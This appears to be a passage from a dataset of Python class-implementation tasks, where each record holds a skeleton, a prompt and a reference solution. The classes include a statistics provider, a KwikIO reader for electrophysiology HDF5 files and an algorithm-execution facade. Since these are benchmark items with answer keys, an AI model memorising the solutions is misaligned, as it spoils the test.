provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = ignore_missing\n\n def provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n", "source": "the_stack_v2_python_sparse", "source_path": "aries_cloudagent/config/provider.py", "source_repo": "hyperledger/aries-cloudagent-python", "split": "test", "star_events_count": 370} {"blob_id": "ccee0d533b8ff28049f232b8de54df919b3f2c2c", "bodies": ["BaseIO.__init__(self)\nself._filename = filename\nself._path, file = os.path.split(filename)\nself._kwik = h5py.File(filename, 'r')\nself._dataset = dataset\ntry:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\nexcept:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\nself._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\nself._attrs = {}\nself._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\nself._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\nself._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\ntry:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\nexcept:\n self._attrs['app_data'] = False", "blk = Block()\nif cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\nblk.create_many_to_one_relationship()\nreturn blk", "if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\nelse:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\nif lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\nelse:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\nanasig.annotate(info='raw traces')\nreturn anasig"], "bodies_text": "<|body_start_0|>\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n<|end_body_0|>\n\n<|body_start_1|>\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n<|end_body_1|>\n\n<|body_start_2|>\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n<|end_body_2|>\n", "class_docstring": "Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`", "class_name": "KwikIO", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\"\"\"\n <|body_0|>\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n <|body_1|>\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n<|end_body_0|>\n\n<|body_start_1|>\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n<|end_body_1|>\n\n<|body_start_2|>\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000454", "length_bytes": 6675, "license_type": "permissive", "methods": [{"docstring": "Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer", "name": "__init__", "signature": "def __init__(self, filename, dataset=0)"}, {"docstring": "Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)", "name": "read_block", "signature": "def read_block(self, lazy=False, cascade=True, channel_index=None)"}, {"docstring": "Read raw traces Arguments: channel_index: must be integer array", "name": "read_analogsignal", "signature": "def read_analogsignal(self, channel_index=None, lazy=False, cascade=True)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004500", "prompt": "Implement the Python class `KwikIO` described below.\n\nClass description:\nClass for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\n\nMethod signatures and docstrings:\n- def __init__(self, filename, dataset=0): Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\n- def read_block(self, lazy=False, cascade=True, channel_index=None): Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\n- def read_analogsignal(self, channel_index=None, lazy=False, cascade=True): Read raw traces Arguments: channel_index: must be integer array", "prompted_full_text": "Implement the Python class `KwikIO` described below.\n\nClass description:\nClass for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\n\nMethod signatures and docstrings:\n- def __init__(self, filename, dataset=0): Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\n- def read_block(self, lazy=False, cascade=True, channel_index=None): Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\n- def read_analogsignal(self, channel_index=None, lazy=False, cascade=True): Read raw traces Arguments: channel_index: must be integer array\n\n<|skeleton|>\nclass KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\"\"\"\n <|body_0|>\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n <|body_1|>\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n<|end_body_0|>\n\n<|body_start_1|>\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n<|end_body_1|>\n\n<|body_start_2|>\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n<|end_body_2|>\n", "revision_id": "e06cda2bd4ec849655de76bea563c597fbdb41e3", "skeleton": "<|skeleton|>\nclass KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\"\"\"\n <|body_0|>\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n <|body_1|>\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\"\"\"\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n", "source": "the_stack_v2_python_sparse", "source_path": "pore_stats/rp/python-neo-master/neo/io/kwikio.py", "source_repo": "codycombs/pore_stats", "split": "test", "star_events_count": 0} {"blob_id": "9a1fec6a5f68cf484ebbfd2566c6515dbbe380aa", "bodies": ["my_module_path = str_plugin_path\nmy_plugin = str_plugin\ntry:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\nexcept Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\nreturn my_class", "if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\nelse:\n my_implementation = implem\nmy_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\nif exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\nreturn FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)", "parsed_plugin = executable_algo.get_execution_plugin().split('::')\nmodule_path = parsed_plugin[0]\nplugin_class_name = parsed_plugin[1]\nmy_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\nmy_engine = my_plugin_class(executable_algo, debug, dao_managed)\nmy_status = my_engine.execute()\nreturn (my_engine.get_executable_algo(), my_status)"], "bodies_text": "<|body_start_0|>\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n<|end_body_1|>\n\n<|body_start_2|>\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n<|end_body_2|>\n", "class_docstring": "Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )", "class_name": "FacadeExecution", "detected_licenses": ["LGPL-3.0-only", "LGPL-2.0-or-later", "LGPL-3.0-or-later", "Zlib", "BSD-3-Clause", "Python-2.0", "ZPL-2.0", "LicenseRef-scancode-openssl-exception-lgpl3.0plus", "ZPL-2.1", "Apache-2.0", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\"\"\"\n <|body_0|>\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length than output_arg_names: each element is either None or instance of Data\"\"\"\n <|body_1|>\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Intanciates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional(default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n<|end_body_1|>\n\n<|body_start_2|>\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000455", "length_bytes": 6584, "license_type": "permissive", "methods": [{"docstring": "private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)", "name": "__eval_exec_engine_class", "signature": "def __eval_exec_engine_class(cls, str_plugin_path, str_plugin)"}, {"docstring": "Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length than output_arg_names: each element is either None or instance of Data", "name": "execute_algo_without_custom", "signature": "def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True)"}, {"docstring": "Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Intanciates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional(default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean", "name": "execute_algo", "signature": "def execute_algo(executable_algo, debug=False, dao_managed=False)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004961", "prompt": "Implement the Python class `FacadeExecution` described below.\n\nClass description:\nProvides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\n\nMethod signatures and docstrings:\n- def __eval_exec_engine_class(cls, str_plugin_path, str_plugin): private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\n- def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True): Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length than output_arg_names: each element is either None or instance of Data\n- def execute_algo(executable_algo, debug=False, dao_managed=False): Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Intanciates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional(default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean", "prompted_full_text": "Implement the Python class `FacadeExecution` described below.\n\nClass description:\nProvides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\n\nMethod signatures and docstrings:\n- def __eval_exec_engine_class(cls, str_plugin_path, str_plugin): private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\n- def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True): Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length than output_arg_names: each element is either None or instance of Data\n- def execute_algo(executable_algo, debug=False, dao_managed=False): Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Intanciates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional(default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\n\n<|skeleton|>\nclass FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an 